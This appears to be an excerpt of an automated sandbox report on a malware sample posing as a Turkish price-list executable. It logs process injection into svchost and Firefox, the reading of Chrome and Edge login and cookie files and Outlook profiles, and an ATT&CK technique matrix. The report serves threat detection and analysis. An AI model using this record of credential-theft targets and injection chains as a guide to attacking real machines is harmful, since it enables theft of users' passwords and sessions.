                Source: C:\Windows\SysWOW64\reg.exe Section loaded: NULL target: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe protection: read write
                Source: C:\Windows\SysWOW64\reg.exe Section loaded: NULL target: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\reg.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\reg.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\reg.exe Thread register set: target process: 7464
                Source: C:\Windows\SysWOW64\reg.exe Thread APC queued: target process: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 31D4008
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Code function: 0_2_001E87B1 LogonUserW
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Code function: 0_2_00193B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Code function: 0_2_001948D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Code function: 0_2_001F4C27 mouse_event
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe"
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\SysWOW64\reg.exe"
                Source: C:\Windows\SysWOW64\reg.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Code function: 0_2_001E7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Code function: 0_2_001E874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe, uD8F5JGUDvEpNoCYQYtn.exe, 00000003.00000002.3580687763.00000000011B0000.00000002.00000001.00040000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 00000003.00000000.1182716298.00000000011B0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                Source: uD8F5JGUDvEpNoCYQYtn.exe, 00000003.00000002.3580687763.00000000011B0000.00000002.00000001.00040000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 00000003.00000000.1182716298.00000000011B0000.00000002.00000001.00040000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 0000000D.00000000.1342283987.0000000001B41000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                Source: uD8F5JGUDvEpNoCYQYtn.exe, 00000003.00000002.3580687763.00000000011B0000.00000002.00000001.00040000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 00000003.00000000.1182716298.00000000011B0000.00000002.00000001.00040000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 0000000D.00000000.1342283987.0000000001B41000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: ?Program Manager
                Source: uD8F5JGUDvEpNoCYQYtn.exe, 00000003.00000002.3580687763.00000000011B0000.00000002.00000001.00040000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 00000003.00000000.1182716298.00000000011B0000.00000002.00000001.00040000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 0000000D.00000000.1342283987.0000000001B41000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Code function: 0_2_001B862B cpuid
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Code function: 0_2_001C4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Code function: 0_2_001D1E06 GetUserNameW
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Code function: 0_2_001C3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Code function: 0_2_001949A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

                Stealing of Sensitive Information

                Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000004.00000002.3579520050.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000D.00000002.3583192639.0000000005910000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.3579268739.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.3579601950.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1260442665.0000000006120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1257841114.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.3581016954.00000000027A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1258855778.0000000003D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\reg.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\reg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\reg.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\reg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\reg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\reg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\reg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\reg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\reg.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe | Binary or memory string: WIN_81
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe | Binary or memory string: WIN_XP
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe | Binary or memory string: WIN_XPe
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe | Binary or memory string: WIN_VISTA
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe | Binary or memory string: WIN_7
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe | Binary or memory string: WIN_8
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe | Code function: 0_2_00206283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00206283
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe | Code function: 0_2_00206747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00206747
                | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                | Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 5 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
                | Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
                | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 5 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
                | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 3 Obfuscated Files or Information | NTDS | 116 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 5 Application Layer Protocol | Traffic Duplication | Data Destruction |
                | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 DLL Side-Loading | LSA Secrets | 151 Security Software Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
                | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 412 Process Injection | 2 Valid Accounts | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
                | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Modify Registry | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
                | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 2 Virtualization/Sandbox Evasion | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
                | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 21 Access Token Manipulation | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
                | IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 412 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
                [Behavior graph, ID 1633359. Sample: F#U0130YAT #U0130STE#U011e#... Start date: 10/03/2025. Architecture: WINDOWS. Score: 100. Process chain: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe (started) -> svchost.exe (started) -> uD8F5JGUDvEpNoCYQYtn.exe (injected) -> reg.exe (started) -> uD8F5JGUDvEpNoCYQYtn.exe (injected) and firefox.exe (started).]
